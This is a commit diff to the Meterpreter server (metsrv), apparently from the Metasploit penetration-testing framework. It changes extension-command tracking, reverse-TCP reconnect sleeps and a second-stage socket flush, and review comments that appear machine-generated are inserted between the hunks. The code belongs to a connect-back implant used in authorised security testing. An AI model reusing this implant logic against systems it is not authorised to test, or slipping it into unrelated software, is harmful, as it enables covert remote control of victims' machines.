
Fix posix extension tracking and transport sleeps

This changeset fixes an issue where POSIX failed to keep track of loaded
extensions properly. The timeout calculations used while waiting were
trying to be too clever and have therefore been simplified.

Also added another flush when reconnecting so that the body of the
second instance of metsrv is ignored by the POSIX side. In future, when
stageless meterpreter works with POSIX, we won't have to do this.
This commit is contained in:
OJ 2015-04-17 21:18:51 +10:00
parent 83f82f3129
commit 1d6e87180a
4 changed files with 19 additions and 24 deletions


@ -80,10 +80,10 @@ DWORD request_core_loadlib(Remote *remote, Packet *packet)
if (pExtension->init)
{
dprintf("calling InitServerExtension");
pExtension->end = first;
res = pExtension->init(remote);
pExtension->start = extensionCommands;
pExtension->getname = dlsym(library, "GetExtensionName");
pExtension->deinit = dlsym(library, "DeinitServerExtension");
if (pExtension->getname)
@ -99,7 +99,7 @@ DWORD request_core_loadlib(Remote *remote, Packet *packet)
if (response)
{
for (command = extensionCommands; command != first; command = command->next)
for (command = pExtension->start; command != pExtension->end; command = command->next)
{
packet_add_tlv_string(response, TLV_TYPE_METHOD, command->method);
}
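Review bot: The capture order in the first hunk — `pExtension->end = first;` before `pExtension->init(remote)` and `pExtension->start = extensionCommands;` after it — only brackets this extension's own commands if init prepends to `extensionCommands` and `first` is the list head taken before the call, and neither contract is stated anywhere in the hunk; a comment such as `// init prepends its commands to extensionCommands, so [start, end) is exactly what this extension registered` would make the second hunk's loop readable. `pExtension->start` is also assigned when init returns an error, so the listing loop may later advertise commands of an extension whose init failed, unless the failure path (outside the hunk) unloads it. request_core_loadlib starts and ends outside these hunks.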


@ -46,6 +46,7 @@ BOOL ext_cmd_callback(LPVOID pState, LPVOID pData)
{
packet_add_tlv_string(pEnum->pResponse, TLV_TYPE_STRING, command->method);
}
dprintf("[LISTEXT] Finished listing extension: %s", pExt->name);
return TRUE;
}


@ -17,7 +17,7 @@ MetsrvConfigData global_config =
.proxy_username = "METERPRETER_USERNAME_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
.proxy_password = "METERPRETER_PASSWORD_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
.ssl_cert_hash = "METERPRETER_SSL_CERT_HASH\x00\x00\x00",
.timeouts.placeholder = "METERP_TIMEOUTS\x00"
.timeouts.values = { .expiry = 24*3600*7, .comms = 300, .retry_total = 3600, .retry_wait = 10 }
};
#define SetHandleInformation(a, b, c)
@ -40,6 +40,7 @@ static DWORD reverse_tcp_run(SOCKET reverseSocket, struct sockaddr* sockAddr, in
{
DWORD result = ERROR_SUCCESS;
int start = current_unix_timestamp();
do
{
int retryStart = current_unix_timestamp();
@ -55,11 +56,7 @@ static DWORD reverse_tcp_run(SOCKET reverseSocket, struct sockaddr* sockAddr, in
}
dprintf("[TCP RUN] Connection failed, sleeping for %u s", retryWait);
int waited = current_unix_timestamp() - retryStart;
if ((DWORD)waited < retryWait)
{
sleep((retryWait - (DWORD)waited) * 1000);
}
sleep(retryWait);
} while (((DWORD)current_unix_timestamp() - (DWORD)start) < retryTotal);
if (result == SOCKET_ERROR)
@ -168,11 +165,7 @@ static DWORD reverse_tcp6(const char* host, const char* service, ULONG scopeId,
}
dprintf("[TCP RUN] Connection failed, sleeping for %u s", retryWait);
int waited = current_unix_timestamp() - retryStart;
if ((DWORD)waited < retryWait)
{
sleep((retryWait - (DWORD)waited) * 1000);
}
sleep(retryWait);
} while (((DWORD)current_unix_timestamp() - (DWORD)start) < retryTotal);
closesocket(socketHandle);
@ -886,6 +879,15 @@ static BOOL configure_tcp_connection(Remote* remote, SOCKET sock)
dprintf("[SERVER] Flushing the socket handle...");
server_socket_flush(remote);
// TODO: remove this when stageless stuff happens.
// if we've just "reconnected" then we're going to flush
// the socket a second time beacuse the second stage is
// coming down and we don't want it!
if (ctx->sock_desc_size > 0)
{
server_socket_flush(remote);
}
dprintf("[SERVER] Initializing SSL...");
if (server_initialize_ssl(remote))
{
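Review bot: `retryStart`, declared at the top of the do-loop in the first reverse_tcp_run hunk, looks unused on the new side, since its only visible reader `int waited = current_unix_timestamp() - retryStart;` is removed in the next hunk and again in the reverse_tcp6 hunk; unless the lines between the hunks still reference it, drop the declaration or it will trip -Wunused-variable. The Windows reverse_tcp_run and reverse_tcp6 hunks in the last file make the same removal, so the same check applies there (their declaration is outside the visible hunks). In the configure_tcp_connection hunk the second `server_socket_flush(remote)` relies on the whole second stage having already arrived in the socket buffer when the flush runs; if part of it is still in flight, the remainder would be read by the SSL handshake that follows, so a comment stating that timing assumption would help, e.g. `// assumes the second stage has fully arrived before this flush; bytes arriving later are seen by the SSL handshake`. Also `beacuse` in the added comment is misspelled. All of these functions start and end outside the hunks.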


@ -47,11 +47,7 @@ static DWORD reverse_tcp_run(SOCKET reverseSocket, SOCKADDR* sockAddr, int sockA
}
dprintf("[TCP RUN] Connection failed, sleeping for %u s", retryWait);
int waited = current_unix_timestamp() - retryStart;
if ((DWORD)waited < retryWait)
{
Sleep((retryWait - (DWORD)waited) * 1000);
}
Sleep(retryWait * 1000);
} while (((DWORD)current_unix_timestamp() - (DWORD)start) < retryTotal);
if (result == SOCKET_ERROR)
@ -168,11 +164,7 @@ static DWORD reverse_tcp6(const char* host, const char* service, ULONG scopeId,
}
dprintf("[TCP RUN] Connection failed, sleeping for %u s", retryWait);
int waited = current_unix_timestamp() - retryStart;
if ((DWORD)waited < retryWait)
{
Sleep((retryWait - (DWORD)waited) * 1000);
}
Sleep(retryWait * 1000);
} while (((DWORD)current_unix_timestamp() - (DWORD)start) < retryTotal);
closesocket(socketHandle);